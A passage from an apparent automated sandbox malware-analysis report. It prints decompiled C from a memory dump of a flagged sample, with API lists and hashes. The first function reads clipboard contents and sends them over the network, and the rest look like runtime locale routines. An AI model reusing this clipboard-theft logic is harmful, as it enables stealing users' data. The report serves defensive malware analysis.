                              • Instruction Fuzzy Hash: 1F511672A00216ABFB264E61DC41EEF77A9EB44B56F14466AFD04D6280DB3CDD408698
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E00412724(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                              				void* __ebx;
                              				void* _t16;
                              				struct HWND__* _t23;
                              				void* _t38;
                              				void* _t41;
                              
                              				if(OpenClipboard(_t23) != 0) {
                              					EmptyClipboard();
                              					CloseClipboard();
                              					if(OpenClipboard(_t23) != 0) {
                              						_t38 = GetClipboardData(0xd);
                              						_t16 = GlobalLock(_t38);
                              						GlobalUnlock(_t38);
                              						CloseClipboard();
                              						_t29 =  !=  ? _t16 : 0x45f714;
                              						E0040425F(_t23,  &_a36,  !=  ? _t16 : 0x45f714);
                              						_t34 =  &_a32;
                              						L00416CF4(_t23, _t41 - 0x18,  &_a32);
                              						_push(0x6b);
                              						L00404A6E(_t23, 0x46c768,  &_a32, _t16);
                              						L00401ED0();
                              					}
                              				}
                              				L00401E54( &_a16, _t34);
                              				L00401FA7();
                              				L00401FA7();
                              				return 0;
                              			}

                              APIs
                              • OpenClipboard.USER32 ref: 00412725
                              • EmptyClipboard.USER32 ref: 00412733
                              • CloseClipboard.USER32 ref: 00412739
                              • OpenClipboard.USER32 ref: 00412740
                              • GetClipboardData.USER32 ref: 00412750
                              • GlobalLock.KERNEL32 ref: 00412759
                              • GlobalUnlock.KERNEL32(00000000), ref: 00412762
                              • CloseClipboard.USER32 ref: 00412768
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                              • String ID:
                              • API String ID: 2172192267-0
                              • Opcode ID: b41a75f227100de5b93510063d07bff1ec11f8c1ae7a32dbd0f192b5edc047f4
                              • Instruction ID: 4156f71339dd3ecea6f92ec0e14f94680420b0c666956b6fa8fd4283cc091fe2
                              • Opcode Fuzzy Hash: b41a75f227100de5b93510063d07bff1ec11f8c1ae7a32dbd0f192b5edc047f4
                              • Instruction Fuzzy Hash: 7F0161312043008BC314BF71ED49AAEB7A5AF90743F44457FF906D21A2DF38CA588A5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E00447855(void* __edx, char _a4) {
                              				void* _v8;
                              				void* _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				char _v28;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t53;
                              				void _t57;
                              				intOrPtr _t58;
                              				intOrPtr _t59;
                              				intOrPtr _t60;
                              				intOrPtr _t61;
                              				signed int _t64;
                              				char _t92;
                              				char _t100;
                              				void* _t101;
                              				signed int _t104;
                              				void* _t107;
                              				void* _t121;
                              				char* _t123;
                              				signed int _t127;
                              				intOrPtr* _t132;
                              				void* _t133;
                              				intOrPtr* _t134;
                              				signed int _t135;
                              				signed int _t136;
                              				signed int _t137;
                              				signed int _t138;
                              				char* _t139;
                              
                              				_t121 = __edx;
                              				_t100 = _a4;
                              				_v28 = _t100;
                              				_v24 = 0;
                              				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                              					_v16 = 1;
                              					_t53 = L0043DFD9(_t101, 1, 0x50);
                              					_v8 = _t53;
                              					if(_t53 != 0) {
                              						_t104 = 0x14;
                              						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                              						_t132 = E0043E61D(0, 4);
                              						_t127 = 0;
                              						_v12 = _t132;
                              						L0043EE85(0);
                              						_pop(_t107);
                              						if(_t132 != 0) {
                              							 *_t132 = 0;
                              							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                              								_t133 = _v8;
                              								_t57 =  *0x46a188; // 0x46a180
                              								 *_t133 = _t57;
                              								_t58 =  *0x46a18c; // 0x46b64c
                              								 *((intOrPtr*)(_t133 + 4)) = _t58;
                              								_t59 =  *0x46a190; // 0x46b64c
                              								 *((intOrPtr*)(_t133 + 8)) = _t59;
                              								_t60 =  *0x46a1b8; // 0x46a184
                              								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                              								_t61 =  *0x46a1bc; // 0x46b650
                              								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                              								L19:
                              								 *_v12 = 1;
                              								if(_t127 != 0) {
                              									 *_t127 = 1;
                              								}
                              								goto L21;
                              							}
                              							_t134 = E0043E61D(_t107, 4);
                              							_v20 = _t134;
                              							L0043EE85(0);
                              							if(_t134 == 0) {
                              								L11:
                              								L0043EE85(_v8);
                              								L0043EE85(_v12);
                              								return _v16;
                              							}
                              							 *_t134 = 0;
                              							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                              							_t135 = E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                              							_t136 = _t135 | E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                              							_v16 = _v8 + 8;
                              							_t137 = _t136 | E0044A26E(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                              							_t138 = _t137 | E0044A26E(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                              							if((E0044A26E(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                              								_t123 =  *_v16;
                              								while( *_t123 != 0) {
                              									_t92 =  *_t123;
                              									if(_t92 < 0x30 || _t92 > 0x39) {
                              										if(_t92 != 0x3b) {
                              											goto L16;
                              										}
                              										_t139 = _t123;
                              										do {
                              											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                              											_t139 = _t139 + 1;
                              										} while ( *_t139 != 0);
                              									} else {
                              										 *_t123 = _t92 - 0x30;
                              										L16:
                              										_t123 = _t123 + 1;
                              									}
                              								}
                              								_t127 = _v20;
                              								_t133 = _v8;
                              								goto L19;
                              							}
                              							E004477EC(_v8);
                              							_v16 = _v16 | 0xffffffff;
                              							goto L11;
                              						}
                              						L0043EE85(_v8);
                              						return 1;
                              					}
                              					return 1;
                              				} else {
                              					_t127 = 0;
                              					_v12 = 0;
                              					_t133 = 0x46a188;
                              					L21:
                              					_t64 =  *(_t100 + 0x80);
                              					if(_t64 != 0) {
                              						asm("lock dec dword [eax]");
                              					}
                              					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                              						asm("lock xadd [ecx], eax");
                              						if((_t64 | 0xffffffff) == 0) {
                              							L0043EE85( *((intOrPtr*)(_t100 + 0x7c)));
                              							L0043EE85( *(_t100 + 0x88));
                              						}
                              					}
                              					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                              					 *(_t100 + 0x80) = _t127;
                              					 *(_t100 + 0x88) = _t133;
                              					return 0;
                              				}
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: b3c4254b1914d5676fdef0349b01322d8a8533affb1a52188d7c82f1ea8becb2
                              • Instruction ID: 4a395575b819a6d294d3ee7acebf23b8f9ee550dc3552f8ac4883c6f511beba5
                              • Opcode Fuzzy Hash: b3c4254b1914d5676fdef0349b01322d8a8533affb1a52188d7c82f1ea8becb2
                              • Instruction Fuzzy Hash: 7361F371904205AFEB20DF65C842B9EBBF4EF49710F14016BE954EB381E7749D42CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 73%
                              			E0043D1E1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v36;
                              				signed int _v40;
                              				intOrPtr _v44;
                              				signed int _v56;
                              				char _v276;
                              				short _v278;
                              				short _v280;
                              				char _v448;
                              				signed int _v452;
                              				signed int _v456;
                              				short _v458;
                              				intOrPtr _v460;
                              				intOrPtr _v464;
                              				signed int _v468;
                              				signed int _v472;
                              				intOrPtr _v508;
                              				char _v536;
                              				signed int _v540;
                              				intOrPtr _v544;
                              				signed int _v556;
                              				char _v708;
                              				signed int _v712;
                              				signed int _v716;
                              				short _v718;
                              				signed int* _v720;
                              				signed int _v724;
                              				signed int _v728;
                              				signed int _v732;
                              				signed int* _v736;
                              				signed int _v740;
                              				signed int _v744;
                              				signed int _v748;
                              				signed int _v752;
                              				char _v820;
                              				char _v1248;
                              				char _v1256;
                              				intOrPtr _v1276;
                              				signed int _v1292;
                              				signed int _t241;
                              				void* _t244;
                              				signed int _t247;
                              				signed int _t249;
                              				signed int _t255;
                              				signed int _t256;
                              				signed int _t257;
                              				signed int _t258;
                              				signed int _t259;
                              				signed int _t261;
                              				signed int _t263;
                              				void* _t265;
                              				signed int _t266;
                              				signed int _t267;
                              				signed int _t268;
                              				signed int _t270;
                              				signed int _t273;
                              				signed int _t280;
                              				signed int _t281;
                              				signed int _t282;
                              				intOrPtr _t283;
                              				signed int _t286;
                              				signed int _t290;
                              				signed int _t291;
                              				signed int _t296;
                              				signed int _t297;
                              				signed int _t299;
                              				signed int _t319;
                              				signed int _t320;
                              				signed int _t323;
                              				signed int _t328;
                              				void* _t330;
                              				signed int _t332;
                              				void* _t333;
                              				intOrPtr _t334;
                              				signed int _t339;
                              				signed int _t340;
                              				intOrPtr* _t343;
                              				signed int _t357;
                              				signed int _t359;
                              				signed int _t361;
                              				intOrPtr* _t362;
                              				signed int _t364;
                              				signed int _t370;
                              				intOrPtr* _t374;
                              				intOrPtr* _t377;
                              				void* _t380;
                              				intOrPtr* _t381;
                              				intOrPtr* _t382;
                              				signed int _t393;
                              				signed int _t396;
                              				intOrPtr* _t397;
                              				signed int _t399;
                              				signed int* _t403;
                              				intOrPtr* _t410;
                              				intOrPtr* _t411;
                              				signed int _t421;
                              				short _t422;
                              				void* _t424;
                              				signed int _t425;
                              				signed int _t427;
                              				intOrPtr _t428;
                              				signed int _t431;
                              				intOrPtr _t432;
                              				signed int _t434;
                              				signed int _t437;
                              				intOrPtr _t443;
                              				signed int _t444;
                              				signed int _t446;
                              				signed int _t447;
                              				signed int _t450;
                              				signed int _t452;
                              				signed int _t456;
                              				signed int* _t457;
                              				intOrPtr* _t458;
                              				short _t459;
                              				void* _t461;
                              				signed int _t463;
                              				signed int _t465;
                              				void* _t467;
                              				void* _t468;
                              				void* _t470;
                              				signed int _t471;
                              				void* _t472;
                              				void* _t474;
                              				signed int _t475;
                              				void* _t477;
                              				void* _t479;
                              				intOrPtr _t491;
                              
                              				_t420 = __edx;
                              				_t461 = _t467;
                              				_t468 = _t467 - 0xc;
                              				_push(__ebx);
                              				_push(__esi);
                              				_v12 = 1;
                              				_t357 = E0043E61D(__ecx, 0x6a6);
                              				_t240 = 0;
                              				_pop(_t370);
                              				if(_t357 == 0) {
                              					L20:
                              					return _t240;
                              				} else {
                              					_push(__edi);
                              					_t2 = _t357 + 4; // 0x4
                              					_t427 = _t2;
                              					 *_t427 = 0;
                              					 *_t357 = 1;
                              					_t443 = _a4;
                              					_t4 = _t443 + 0x30; // 0x43c9e0
                              					_t241 = _t4;
                              					_push( *_t241);
                              					_v16 = _t241;
                              					_push(0x457488);
                              					_push( *0x457344);
                              					E0043D120(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                              					_t470 = _t468 + 0x18;
                              					_v8 = 0x457344;
                              					while(1) {
                              						L2:
                              						_t244 = L00446DB7(_t427, 0x351, ";");
                              						_t471 = _t470 + 0xc;
                              						if(_t244 != 0) {
                              							break;
                              						} else {
                              							_t8 = _v16 + 0x10; // 0x10
                              							_t410 = _t8;
                              							_t339 =  *_v16;
                              							_v16 = _t410;
                              							_t411 =  *_t410;
                              							goto L4;
                              						}
                              						while(1) {
                              							L4:
                              							_t420 =  *_t339;
                              							if(_t420 !=  *_t411) {
                              								break;
                              							}
                              							if(_t420 == 0) {
                              								L8:
                              								_t340 = 0;
                              							} else {
                              								_t420 =  *((intOrPtr*)(_t339 + 2));
                              								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                              									break;
                              								} else {
                              									_t339 = _t339 + 4;
                              									_t411 = _t411 + 4;
                              									if(_t420 != 0) {
                              										continue;
                              									} else {
                              										goto L8;
                              									}
                              								}
                              							}
                              							L10:
                              							asm("sbb eax, eax");
                              							_t370 = _v8 + 0xc;
                              							_v8 = _t370;
                              							_v12 = _v12 &  !( ~_t340);
                              							_t343 = _v16;
                              							_v16 = _t343;
                              							_push( *_t343);
                              							_push(0x457488);
                              							_push( *_t370);
                              							E0043D120(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                              							_t470 = _t471 + 0x18;
                              							if(_v8 < 0x457374) {
                              								goto L2;
                              							} else {
                              								if(_v12 != 0) {
                              									L0043EE85(_t357);
                              									_t31 = _t443 + 0x28; // 0x30ff068b
                              									_t434 = _t427 | 0xffffffff;
                              									__eflags =  *_t31;
                              									if(__eflags != 0) {
                              										asm("lock xadd [ecx], eax");
                              										if(__eflags == 0) {
                              											_t32 = _t443 + 0x28; // 0x30ff068b
                              											L0043EE85( *_t32);
                              										}
                              									}
                              									_t33 = _t443 + 0x24; // 0x30ff0c46
                              									__eflags =  *_t33;
                              									if( *_t33 != 0) {
                              										asm("lock xadd [eax], edi");
                              										__eflags = _t434 == 1;
                              										if(_t434 == 1) {
                              											_t34 = _t443 + 0x24; // 0x30ff0c46
                              											L0043EE85( *_t34);
                              										}
                              									}
                              									 *(_t443 + 0x24) = 0;
                              									 *(_t443 + 0x1c) = 0;
                              									 *(_t443 + 0x28) = 0;
                              									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                              									_t39 = _t443 + 0x40; // 0x10468b00
                              									_t240 =  *_t39;
                              								} else {
                              									_t20 = _t443 + 0x28; // 0x30ff068b
                              									_t437 = _t427 | 0xffffffff;
                              									_t491 =  *_t20;
                              									if(_t491 != 0) {
                              										asm("lock xadd [ecx], eax");
                              										if(_t491 == 0) {
                              											_t21 = _t443 + 0x28; // 0x30ff068b
                              											L0043EE85( *_t21);
                              										}
                              									}
                              									_t22 = _t443 + 0x24; // 0x30ff0c46
                              									if( *_t22 != 0) {
                              										asm("lock xadd [eax], edi");
                              										if(_t437 == 1) {
                              											_t23 = _t443 + 0x24; // 0x30ff0c46
                              											L0043EE85( *_t23);
                              										}
                              									}
                              									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                              									_t26 = _t357 + 4; // 0x4
                              									_t240 = _t26;
                              									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                              									 *(_t443 + 0x28) = _t357;
                              									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                              								}
                              								goto L20;
                              							}
                              							goto L130;
                              						}
                              						asm("sbb eax, eax");
                              						_t340 = _t339 | 0x00000001;
                              						__eflags = _t340;
                              						goto L10;
                              					}
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					E0043629A();
                              					asm("int3");
                              					_push(_t461);
                              					_t463 = _t471;
                              					_t472 = _t471 - 0x1d0;
                              					_t247 =  *0x46a00c; // 0x5d382218
                              					_v56 = _t247 ^ _t463;
                              					_t249 = _v40;
                              					_push(_t357);
                              					_push(_t443);
                              					_t444 = _v36;
                              					_push(_t427);
                              					_t428 = _v44;
                              					_v508 = _t428;
                              					__eflags = _t249;
                              					if(_t249 == 0) {
                              						_v456 = 1;
                              						_v468 = 0;
                              						_t359 = 0;
                              						_v452 = 0;
                              						__eflags = _t444;
                              						if(__eflags == 0) {
                              							L79:
                              							E0043D1E1(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                              							goto L80;
                              						} else {
                              							__eflags =  *_t444 - 0x4c;
                              							if( *_t444 != 0x4c) {
                              								L58:
                              								_push(0);
                              								_t255 = L0043CDA9(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                              								_t474 = _t472 + 0x18;
                              								__eflags = _t255;
                              								if(_t255 != 0) {
                              									_t370 = 0;
                              									__eflags = 0;
                              									_t76 = _t428 + 0x20; // 0x43c9d0
                              									_t421 = _t76;
                              									_t446 = 0;
                              									_v452 = _t421;
                              									do {
                              										__eflags = _t446;
                              										if(_t446 == 0) {
                              											L73:
                              											_t256 = _v456;
                              										} else {
                              											_t374 =  *_t421;
                              											_t257 =  &_v276;
                              											while(1) {
                              												__eflags =  *_t257 -  *_t374;
                              												_t428 = _v464;
                              												if( *_t257 !=  *_t374) {
                              													break;
                              												}
                              												__eflags =  *_t257;
                              												if( *_t257 == 0) {
                              													L66:
                              													_t370 = 0;
                              													_t258 = 0;
                              												} else {
                              													_t422 =  *((intOrPtr*)(_t257 + 2));
                              													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                              													_v458 = _t422;
                              													_t421 = _v452;
                              													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                              														break;
                              													} else {
                              														_t257 = _t257 + 4;
                              														_t374 = _t374 + 4;
                              														__eflags = _v458;
                              														if(_v458 != 0) {
                              															continue;
                              														} else {
                              															goto L66;
                              														}
                              													}
                              												}
                              												L68:
                              												__eflags = _t258;
                              												if(_t258 == 0) {
                              													_t359 = _t359 + 1;
                              													__eflags = _t359;
                              													goto L73;
                              												} else {
                              													_t259 =  &_v276;
                              													_push(_t259);
                              													_push(_t446);
                              													_push(_t428);
                              													L83();
                              													_t421 = _v452;
                              													_t474 = _t474 + 0xc;
                              													__eflags = _t259;
                              													if(_t259 == 0) {
                              														_t370 = 0;
                              														_t256 = 0;
                              														_v456 = 0;
                              													} else {
                              														_t359 = _t359 + 1;
                              														_t370 = 0;
                              														goto L73;
                              													}
                              												}
                              												goto L74;
                              											}
                              											asm("sbb eax, eax");
                              											_t258 = _t257 | 0x00000001;
                              											_t370 = 0;
                              											__eflags = 0;
                              											goto L68;
                              										}
                              										L74:
                              										_t446 = _t446 + 1;
                              										_t421 = _t421 + 0x10;
                              										_v452 = _t421;
                              										__eflags = _t446 - 5;
                              									} while (_t446 <= 5);
                              									__eflags = _t256;
                              									if(__eflags != 0) {
                              										goto L79;
                              									} else {
                              										__eflags = _t359;
                              										goto L77;
                              									}
                              								}
                              								goto L80;
                              							} else {
                              								__eflags =  *(_t444 + 2) - 0x43;
                              								if( *(_t444 + 2) != 0x43) {
                              									goto L58;
                              								} else {
                              									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                              									if( *((short*)(_t444 + 4)) != 0x5f) {
                              										goto L58;
                              									} else {
                              										while(1) {
                              											_t261 = L00447F17(_t444, 0x457480);
                              											_t361 = _t261;
                              											_v472 = _t361;
                              											_pop(_t376);
                              											__eflags = _t361;
                              											if(_t361 == 0) {
                              												break;
                              											}
                              											_t263 = _t261 - _t444;
                              											__eflags = _t263;
                              											_v456 = _t263 >> 1;
                              											if(_t263 == 0) {
                              												break;
                              											} else {
                              												_t265 = 0x3b;
                              												__eflags =  *_t361 - _t265;
                              												if( *_t361 == _t265) {
                              													break;
                              												} else {
                              													_t431 = _v456;
                              													_t362 = 0x457344;
                              													_v460 = 1;
                              													do {
                              														_t266 = L00447EDD( *_t362, _t444, _t431);
                              														_t472 = _t472 + 0xc;
                              														__eflags = _t266;
                              														if(_t266 != 0) {
                              															goto L45;
                              														} else {
                              															_t377 =  *_t362;
                              															_t420 = _t377 + 2;
                              															do {
                              																_t334 =  *_t377;
                              																_t377 = _t377 + 2;
                              																__eflags = _t334 - _v468;
                              															} while (_t334 != _v468);
                              															_t376 = _t377 - _t420 >> 1;
                              															__eflags = _t431 - _t377 - _t420 >> 1;
                              															if(_t431 != _t377 - _t420 >> 1) {
                              																goto L45;
                              															}
                              														}
                              														break;
                              														L45:
                              														_v460 = _v460 + 1;
                              														_t362 = _t362 + 0xc;
                              														__eflags = _t362 - 0x457374;
                              													} while (_t362 <= 0x457374);
                              													_t359 = _v472 + 2;
                              													_t267 = L00447E8D(_t376, _t359, ";");
                              													_t428 = _v464;
                              													_t447 = _t267;
                              													_pop(_t380);
                              													__eflags = _t447;
                              													if(_t447 != 0) {
                              														L48:
                              														__eflags = _v460 - 5;
                              														if(_v460 > 5) {
                              															_t268 = _v452;
                              															goto L54;
                              														} else {
                              															_push(_t447);
                              															_t270 = L00446EF9(_t380,  &_v276, 0x83, _t359);
                              															_t475 = _t472 + 0x10;
                              															__eflags = _t270;
                              															if(_t270 != 0) {
                              																L82:
                              																_push(0);
                              																_push(0);
                              																_push(0);
                              																_push(0);
                              																_push(0);
                              																E0043629A();
                              																asm("int3");
                              																_push(_t463);
                              																_t465 = _t475;
                              																_t273 =  *0x46a00c; // 0x5d382218
                              																_v556 = _t273 ^ _t465;
                              																_push(_t359);
                              																_t364 = _v540;
                              																_push(_t447);
                              																_push(_t428);
                              																_t432 = _v544;
                              																_v1292 = _t364;
                              																_v1276 = E00440972(_t364, _t380, _t420) + 0x278;
                              																_push( &_v1256);
                              																_t280 = L0043CDA9(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                              																_t477 = _t475 - 0x2e4 + 0x18;
                              																__eflags = _t280;
                              																if(_t280 != 0) {
                              																	_t101 = _t364 + 2; // 0x6
                              																	_t450 = _t101 << 4;
                              																	__eflags = _t450;
                              																	_t281 =  &_v280;
                              																	_v724 = _t450;
                              																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                              																	while(1) {
                              																		_v712 = _v712 & 0x00000000;
                              																		__eflags =  *_t281 -  *_t381;
                              																		_t452 = _v724;
                              																		if( *_t281 !=  *_t381) {
                              																			break;
                              																		}
                              																		__eflags =  *_t281;
                              																		if( *_t281 == 0) {
                              																			L91:
                              																			_t282 = _v712;
                              																		} else {
                              																			_t459 =  *((intOrPtr*)(_t281 + 2));
                              																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                              																			_v718 = _t459;
                              																			_t452 = _v724;
                              																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                              																				break;
                              																			} else {
                              																				_t281 = _t281 + 4;
                              																				_t381 = _t381 + 4;
                              																				__eflags = _v718;
                              																				if(_v718 != 0) {
                              																					continue;
                              																				} else {
                              																					goto L91;
                              																				}
                              																			}
                              																		}
                              																		L93:
                              																		__eflags = _t282;
                              																		if(_t282 != 0) {
                              																			_t382 =  &_v280;
                              																			_t424 = _t382 + 2;
                              																			do {
                              																				_t283 =  *_t382;
                              																				_t382 = _t382 + 2;
                              																				__eflags = _t283 - _v712;
                              																			} while (_t283 != _v712);
                              																			_v728 = (_t382 - _t424 >> 1) + 1;
                              																			_t286 = E0043E61D(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                              																			_v740 = _t286;
                              																			__eflags = _t286;
                              																			if(_t286 == 0) {
                              																				goto L84;
                              																			} else {
                              																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                              																				_t125 = _t364 * 4; // 0xb86e
                              																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
                              																				_t128 = _t432 + 8; // 0x8b56ff8b
                              																				_v748 =  *_t128;
                              																				_t391 =  &_v280;
                              																				_v720 = _t286 + 4;
                              																				_t290 = E00440264(_t286 + 4, _v728,  &_v280);
                              																				_t479 = _t477 + 0xc;
                              																				__eflags = _t290;
                              																				if(_t290 != 0) {
                              																					_t291 = _v712;
                              																					_push(_t291);
                              																					_push(_t291);
                              																					_push(_t291);
                              																					_push(_t291);
                              																					_push(_t291);
                              																					E0043629A();
                              																					asm("int3");
                              																					return  *0x46b508;
                              																				} else {
                              																					__eflags = _v280 - 0x43;
                              																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                              																					if(_v280 != 0x43) {
                              																						L102:
                              																						_t296 = L0043CAB6(_t364, _t391, _t432,  &_v708);
                              																						_t393 = _v712;
                              																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                              																					} else {
                              																						__eflags = _v278;
                              																						if(_v278 != 0) {
                              																							goto L102;
                              																						} else {
                              																							_t393 = _v712;
                              																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                              																						}
                              																					}
                              																					__eflags = _t364 - 2;
                              																					if(_t364 != 2) {
                              																						__eflags = _t364 - 1;
                              																						if(_t364 != 1) {
                              																							__eflags = _t364 - 5;
                              																							if(_t364 == 5) {
                              																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                              																							}
                              																						} else {
                              																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                              																						}
                              																					} else {
                              																						_t457 = _v736;
                              																						_t425 = _t393;
                              																						_t403 = _t457;
                              																						 *(_t432 + 8) = _v716;
                              																						_v720 = _t457;
                              																						_v728 = _t457[8];
                              																						_v716 = _t457[9];
                              																						while(1) {
                              																							_t154 = _t432 + 8; // 0x8b56ff8b
                              																							__eflags =  *_t154 -  *_t403;
                              																							if( *_t154 ==  *_t403) {
                              																								break;
                              																							}
                              																							_t458 = _v720;
                              																							_t425 = _t425 + 1;
                              																							_t328 =  *_t403;
                              																							 *_t458 = _v728;
                              																							_v716 = _t403[1];
                              																							_t403 = _t458 + 8;
                              																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                              																							_t364 = _v752;
                              																							_t457 = _v736;
                              																							_v728 = _t328;
                              																							_v720 = _t403;
                              																							__eflags = _t425 - 5;
                              																							if(_t425 < 5) {
                              																								continue;
                              																							} else {
                              																							}
                              																							L110:
                              																							__eflags = _t425 - 5;
                              																							if(__eflags == 0) {
                              																								_t178 = _t432 + 8; // 0x8b56ff8b
                              																								_t319 = L00447F5C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457400, 0x7f,  &_v536,  *_t178, 1);
                              																								_t479 = _t479 + 0x1c;
                              																								__eflags = _t319;
                              																								_t320 = _v712;
                              																								if(_t319 == 0) {
                              																									_t457[1] = _t320;
                              																								} else {
                              																									do {
                              																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                              																										_t320 = _t320 + 1;
                              																										__eflags = _t320 - 0x7f;
                              																									} while (_t320 < 0x7f);
                              																									_t323 = E004330D1( &_v536,  *0x46a170, 0xfe);
                              																									_t479 = _t479 + 0xc;
                              																									__eflags = _t323;
                              																									_t457[1] = 0 | _t323 == 0x00000000;
                              																								}
                              																								_t193 = _t432 + 8; // 0x8b56ff8b
                              																								 *_t457 =  *_t193;
                              																							}
                              																							 *(_t432 + 0x18) = _t457[1];
                              																							goto L121;
                              																						}
                              																						__eflags = _t425;
                              																						if(_t425 != 0) {
                              																							 *_t457 =  *(_t457 + _t425 * 8);
                              																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                              																							 *(_t457 + _t425 * 8) = _v728;
                              																							 *(_t457 + 4 + _t425 * 8) = _v716;
                              																						}
                              																						goto L110;
                              																					}
                              																					L121:
                              																					_t297 = _t364 * 0xc;
                              																					_t200 = _t297 + 0x457340; // 0x40e12c
                              																					 *0x45346c(_t432);
                              																					_t299 =  *((intOrPtr*)( *_t200))();
                              																					_t396 = _v732;
                              																					__eflags = _t299;
                              																					if(_t299 == 0) {
                              																						__eflags = _t396 - 0x46a2a8;
                              																						if(_t396 != 0x46a2a8) {
                              																							_t456 = _t364 + _t364;
                              																							__eflags = _t456;
                              																							asm("lock xadd [eax], ecx");
                              																							if(_t456 != 0) {
                              																								goto L126;
                              																							} else {
                              																								_t218 = _t456 * 8; // 0x30ff068b
                              																								L0043EE85( *((intOrPtr*)(_t432 + _t218 + 0x28)));
                              																								_t221 = _t456 * 8; // 0x30ff0c46
                              																								L0043EE85( *((intOrPtr*)(_t432 + _t221 + 0x24)));
                              																								_t224 = _t364 * 4; // 0xb86e
                              																								L0043EE85( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
                              																								_t399 = _v712;
                              																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                              																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                              																							}
                              																						}
                              																						_t397 = _v740;
                              																						 *_t397 = 1;
                              																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                              																					} else {
                              																						 *(_v724 + _t432) = _t396;
                              																						_t205 = _t364 * 4; // 0xb86e
                              																						L0043EE85( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
                              																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                              																						L0043EE85(_v740);
                              																						 *(_t432 + 8) = _v748;
                              																						goto L84;
                              																					}
                              																					goto L85;
                              																				}
                              																			}
                              																		} else {
                              																			goto L85;
                              																		}
                              																		goto L130;
                              																	}
                              																	asm("sbb eax, eax");
                              																	_t282 = _t281 | 0x00000001;
                              																	__eflags = _t282;
                              																	goto L93;
                              																} else {
                              																	L84:
                              																	__eflags = 0;
                              																	L85:
                              																	__eflags = _v16 ^ _t465;
                              																	return E0042F61B(_v16 ^ _t465);
                              																}
                              															} else {
                              																_t330 = _t447 + _t447;
                              																__eflags = _t330 - 0x106;
                              																if(_t330 >= 0x106) {
                              																	E0042F74F();
                              																	goto L82;
                              																} else {
                              																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
